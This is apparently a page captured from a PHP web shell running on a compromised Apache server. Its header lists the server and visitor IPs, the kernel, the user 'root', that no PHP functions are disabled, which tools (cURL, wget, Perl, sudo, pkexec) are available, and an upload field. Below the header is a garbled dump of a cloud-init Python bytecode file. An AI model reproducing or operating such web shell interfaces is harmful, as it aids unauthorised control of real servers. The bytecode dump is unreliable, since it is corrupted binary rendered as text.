Server IP : 209.38.156.173 / Your IP : 216.73.216.122 [ Web Server : Apache/2.4.52 (Ubuntu) System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64 User : root ( 0) PHP Version : 8.1.2-1ubuntu2.22 Disable Function : NONE Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /usr/lib/python3/dist-packages/cloudinit/__pycache__/ |
Upload File : |
o x[h� � @ sr d Z ddlZddlZddlZddlZddlmZ ddlmZ ddl m Z e�e�Z defdd�ZG d d � d �ZdS )z#A module for common socket helpers.� N)�suppress)�performance)�DEFAULT_RUN_DIR�messagec C s� t j�dd�}|sdS |d dkr|�ddd� n |d dkr#td ��t�tjtjtjB ��}t � d t| �� |�|� |� | �d�� W d � dS 1 sOw Y dS )z[Send a sd_notify message. :param message: sd-notify message (must be valid ascii) � NOTIFY_SOCKET� Nr �@� � �/zUnsupported socket typezSending sd_notify(%s)�ascii)�os�environ�get�replace�OSError�socket�AF_UNIX� SOCK_DGRAM�SOCK_CLOEXEC�LOG�info�str�connect�sendall�encode)r �socket_path�sock� r �2/usr/lib/python3/dist-packages/cloudinit/socket.py� sd_notify s � "�r c @ s<